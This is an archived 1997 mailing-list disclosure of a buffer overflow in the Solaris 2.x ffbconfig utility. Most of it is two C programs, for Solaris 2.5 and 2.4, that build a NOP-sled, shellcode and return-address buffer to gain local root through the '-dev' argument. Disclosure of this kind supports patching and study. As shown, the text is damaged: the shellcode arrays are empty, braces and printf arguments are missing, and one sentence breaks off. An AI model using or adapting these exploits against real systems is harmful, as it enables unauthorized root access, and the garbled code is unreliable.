[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Security hole in Sloaris 2.X ffbconfig + exploit
Mon Feb 10 15:58 EET 1997 Romania
"Buffer Overflow" rules.
I have found a buffer overflow hole in ffbconfig (Solaris2.X). That allow you
to gain root access on your machine. I used an exploit written by Jeremy Elson
for gethostbyname() buffer overflow hole (I modified some values to make this
I dont now yet what in ffbconfig is wrong but Im still diging. So more
detailes later.
Here's the exploit for Solaris 2.X:
---------------------------------- first -------------------------------------
This works on Solaris 2.5 wiz /usr/sbin/ffbconfig
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define BUF_LENGTH 128
#define EXTRA 256
#define STACK_OFFSET 128
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
u_long get_sp(void)
__asm__("mov %sp,%i0 \n");
void main(int argc, char *argv[])
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),so;
long_p = (u_long *) buf;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
execl("/usr/sbin/ffbconfig", "ffbconfig", "-dev", buf,(char *) 0);
perror("execl failed");
------------------------ end of "ffbcexp25.c" --------------------------------
-------------------------------- second --------------------------------------
This works on Solaris 2.4 wiz /usr/sbin/ffbconfig from a Solaris 2.5
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define BUF_LENGTH 128
#define EXTRA 256
#define STACK_OFFSET 128
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
u_long get_sp(void)
__asm__("mov %sp,%i0 \n");
void main(int argc, char *argv[])
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),so;
long_p = (u_long *) buf;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
execl("/usr/sbin/ffbconfig", "ffbconfig", "-dev", buf,(char *) 0);
perror("execl failed");
------------------------------ end of ffbcexp24.c -----------------------------
Cristian Schipor - Computer Science Faculty - Romania - Bucharest
Email: skipo@math.pub.ro or skipo@ns.ima.ro
Phone: (401) 410.60.88
PS: "special for STFP"